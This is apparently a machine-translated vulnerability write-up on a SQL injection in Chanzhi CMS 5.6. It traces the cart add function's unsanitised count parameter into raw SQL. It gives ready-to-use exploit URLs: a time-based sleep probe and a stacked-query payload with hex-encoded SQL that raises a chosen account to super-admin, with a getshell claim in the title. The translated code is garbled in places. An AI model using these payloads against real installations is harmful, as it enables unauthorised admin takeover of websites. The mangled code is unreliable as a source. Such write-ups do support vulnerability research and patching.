HTTPS://SHARE.WEIYUN.COM/5CBFF06337D32A9748D0F1BEAD5DDBD5 Front Desk Injection
The Add function on the/chanzhieps/system/module/cart/control.php page
Public functionAdd$product,$count) { if($this->app->user->account = = ' Guest ') { /*Save info to cookie if user is guest.*/ $this->cart->addincookie ($product,$count); $this->send (Array(' result ' = ' success ', ' message ' =$this->lang->savesuccess)); } Else { $result=$this->cart->add ($product,$count); if($result)$this->send (Array(' result ' = ' success ', ' message ' =$this->lang->savesuccess)); $this->send (Array(' result ' = ' fail ', ' message ' = = DAO::GetError ())); }}
public function add($product, $count)
$count is the user input
We look at the member after the login, that is,
$result = $this->cart->add($product, $count);
/chanzhieps/system/module/cart/model.php
Public functionAdd$productID,$count) { $hasProduct=$this->dao->select (' Count (ID) as Count ')->from (Table_cart)->where (' account ')->eq ($this->app->user->account)->andwhere (' Product ')->eq ($productID)->fetch (' Count '); if(!$hasProduct) { $product=NewStdclass (); $product->product =$productID; $product->account =$this->app->user->Account ; $product-Count=$count; $this->dao->insert (Table_cart)->data ($product),exec(); } Else { $this->dao->update (Table_cart)->set ("count= count + {$count} ")->where (' account ')->eq ($this->app->user->account)->andwhere (' Product ')->eq ($productID),exec(); } return!dao::isError ();}
If you can find the product, update the quantityset("count= count + {$count}")
Continue to follow the Set function
/chanzhieps/system/lib/base/dao/dao.class.php
Public functionSet$set) { /*Add ' To avoid keywords of MySQL.*/ if(Strpos($set, ' = ') = = =false) { $set=Str_replace(‘,‘, ‘‘,$set); $set= "".Str_replace("', '",$set) . '; } $this->sql. =$this->isfirstset? "$set" : ",$set"; if($this->isfirstset)$this->isfirstset =false; return $this;}
Can see directly into the $this->sql
Test it.
http://localhost/www/index.php/cart-add-1-(Select%20sleep (Ten))
Delayed operation is successful
This CMS uses the PDO method to connect to MySQL. That means you can execute multiple statements.
http://localhost/www/index.php/cart-add-1-1;set%[email protected]= 0x757064617465206570735f75736572207365742061646d696e3d27737570657227207768657265206163636f756e743d276675636b796f75273b ;p Repare%20x%20from%[email protected];execute%20x;select%201%20union%20select%201
Update the low-privilege account to Super
Go backstage
[Reproduce] cicada knowledge CMS 5.6 front-Desk injection +getshell